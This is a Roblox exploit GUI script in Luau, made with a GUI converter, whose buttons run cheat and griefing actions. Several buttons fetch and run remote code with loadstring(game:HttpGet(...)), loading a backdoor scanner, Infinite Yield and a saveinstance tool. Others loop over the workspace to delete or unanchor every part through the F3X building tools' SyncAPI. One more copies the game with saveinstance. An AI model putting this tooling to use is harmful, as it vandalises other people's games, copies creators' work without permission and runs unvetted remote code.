-- Generated using RoadToGlory's Converter v1.1 (RoadToGlory#9879)

-- Instances:

local Converted = {
	["_firetrips9guiFE"] = Instance.new("ScreenGui");
	["_ayowhatyoulookingat"] = Instance.new("Frame");
	["_TextLabel"] = Instance.new("TextLabel");
	["_TextButton"] = Instance.new("TextButton");
	["_LocalScript"] = Instance.new("LocalScript");
	["_TextButton1"] = Instance.new("TextButton");
	["_LocalScript1"] = Instance.new("LocalScript");
	["_TextButton2"] = Instance.new("TextButton");
	["_LocalScript2"] = Instance.new("LocalScript");
	["_TextButton3"] = Instance.new("TextButton");
	["_LocalScript3"] = Instance.new("LocalScript");
	["_TextButton4"] = Instance.new("TextButton");
	["_LocalScript4"] = Instance.new("LocalScript");
	["_TextButton5"] = Instance.new("TextButton");
	["_LocalScript5"] = Instance.new("LocalScript");
}

-- Properties:

Converted["_firetrips9guiFE"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Converted["_firetrips9guiFE"].Name = "firetrips9guiFE"
Converted["_firetrips9guiFE"].Parent = game:GetService("CoreGui")

Converted["_ayowhatyoulookingat"].BackgroundColor3 = Color3.fromRGB(40.00000141561031, 78.00000295042992, 255)
Converted["_ayowhatyoulookingat"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_ayowhatyoulookingat"].BorderSizePixel = 3
Converted["_ayowhatyoulookingat"].Position = UDim2.new(0, 0, 0.210031345, 0)
Converted["_ayowhatyoulookingat"].Size = UDim2.new(0, 396, 0, 392)
Converted["_ayowhatyoulookingat"].Name = "ayowhatyoulookingat"
Converted["_ayowhatyoulookingat"].Parent = Converted["_firetrips9guiFE"]

Converted["_TextLabel"].Font = Enum.Font.SourceSans
Converted["_TextLabel"].Text = "Untitled firetrips9 GUI"
Converted["_TextLabel"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel"].TextScaled = true
Converted["_TextLabel"].TextSize = 14
Converted["_TextLabel"].TextWrapped = true
Converted["_TextLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel"].BackgroundTransparency = 1
Converted["_TextLabel"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextLabel"].BorderSizePixel = 3
Converted["_TextLabel"].Size = UDim2.new(0, 396, 0, 62)
Converted["_TextLabel"].ZIndex = 3
Converted["_TextLabel"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton"].Font = Enum.Font.SourceSans
Converted["_TextButton"].Text = "LALOL Hub Backdoor (better than backdoor.exe)"
Converted["_TextButton"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton"].TextScaled = true
Converted["_TextButton"].TextSize = 14
Converted["_TextButton"].TextWrapped = true
Converted["_TextButton"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton"].BorderSizePixel = 0
Converted["_TextButton"].Position = UDim2.new(0, 0, 0.158163264, 0)
Converted["_TextButton"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton1"].Font = Enum.Font.SourceSans
Converted["_TextButton1"].Text = "delete all parts (FE BUT NEEDS F3X AND DOES NOT WORK ON TERRAIN)"
Converted["_TextButton1"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton1"].TextSize = 13
Converted["_TextButton1"].TextWrapped = true
Converted["_TextButton1"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton1"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton1"].BorderSizePixel = 0
Converted["_TextButton1"].Position = UDim2.new(0.333333343, 0, 0.158163264, 0)
Converted["_TextButton1"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton1"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton2"].Font = Enum.Font.SourceSans
Converted["_TextButton2"].Text = "Infinite Yield"
Converted["_TextButton2"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton2"].TextScaled = true
Converted["_TextButton2"].TextSize = 13
Converted["_TextButton2"].TextWrapped = true
Converted["_TextButton2"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton2"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton2"].BorderSizePixel = 0
Converted["_TextButton2"].Position = UDim2.new(0.659090936, 0, 0.158163264, 0)
Converted["_TextButton2"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton2"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton3"].Font = Enum.Font.SourceSans
Converted["_TextButton3"].Text = "unanchor all (again, needs F3X)"
Converted["_TextButton3"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton3"].TextScaled = true
Converted["_TextButton3"].TextSize = 13
Converted["_TextButton3"].TextWrapped = true
Converted["_TextButton3"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton3"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton3"].BorderSizePixel = 0
Converted["_TextButton3"].Position = UDim2.new(0, 0, 0.306122452, 0)
Converted["_TextButton3"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton3"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton4"].Font = Enum.Font.SourceSans
Converted["_TextButton4"].Text = "saveinstance (your exploit needs the function for this to work)"
Converted["_TextButton4"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton4"].TextScaled = true
Converted["_TextButton4"].TextSize = 13
Converted["_TextButton4"].TextWrapped = true
Converted["_TextButton4"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton4"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton4"].BorderSizePixel = 0
Converted["_TextButton4"].Position = UDim2.new(0.333333343, 0, 0.306122452, 0)
Converted["_TextButton4"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton4"].Parent = Converted["_ayowhatyoulookingat"]

Converted["_TextButton5"].Font = Enum.Font.SourceSans
Converted["_TextButton5"].Text = "other saveinstance for exploits that dont have it"
Converted["_TextButton5"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton5"].TextScaled = true
Converted["_TextButton5"].TextSize = 13
Converted["_TextButton5"].TextWrapped = true
Converted["_TextButton5"].BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton5"].BorderColor3 = Color3.fromRGB(0, 0, 255)
Converted["_TextButton5"].BorderSizePixel = 0
Converted["_TextButton5"].Position = UDim2.new(0.659090936, 0, 0.306122452, 0)
Converted["_TextButton5"].Size = UDim2.new(0, 120, 0, 41)
Converted["_TextButton5"].Parent = Converted["_ayowhatyoulookingat"]

-- Fake Module Scripts:

local fake_module_scripts = {}


-- Fake Local Scripts:

local function ICQTYRG_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/Its-LALOL/LALOL-Hub/main/Backdoor-Scanner/script'))();
	end)
end
local function EVMMA_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		while wait() do
			for _, obj in ipairs(workspace:GetChildren()) do
				game.Players.LocalPlayer.Backpack:WaitForChild('Building Tools').SyncAPI:Invoke('Remove', {obj})
			end
		end
	end)
end
local function UAVFU_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton2"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
	end)
end
local function WVBGHZO_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton3"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		while wait() do
			for _, obj in ipairs(workspace:GetChildren()) do
				if obj:IsA('BasePart') then
					game.Players.LocalPlayer.Backpack:WaitForChild('Building Tools').SyncAPI:Invoke('SyncAnchor', {obj})
				else if obj:IsA('Model') then
						game.Players.LocalPlayer.Backpack:WaitForChild('Building Tools').SyncAPI:Invoke('Remove', {obj})
					end
				end
			end
		end
	end)
end
local function HNCIP_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton4"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		saveinstance()
	end)
end
local function YMLOP_fake_script() -- Fake Script: StarterGui.firetrips9guiFE.ayowhatyoulookingat.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton5"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Activated:Connect(function()
		local Params = {
			RepoURL = "https://raw.githubusercontent.com/luau/SynSaveInstance/main/",
			SSI = "saveinstance",
		}
		local synsaveinstance = loadstring(game:HttpGet(Params.RepoURL .. Params.SSI .. ".luau", true), Params.SSI)()
		local Options = {noscripts = true} -- All Options can be found here https://github.com/luau/UniversalSynSaveInstance/blob/main/saveinstance.lua#L772
		synsaveinstance(Options)
	end)
end

coroutine.wrap(ICQTYRG_fake_script)()
coroutine.wrap(EVMMA_fake_script)()
coroutine.wrap(UAVFU_fake_script)()
coroutine.wrap(WVBGHZO_fake_script)()
coroutine.wrap(HNCIP_fake_script)()
coroutine.wrap(YMLOP_fake_script)()
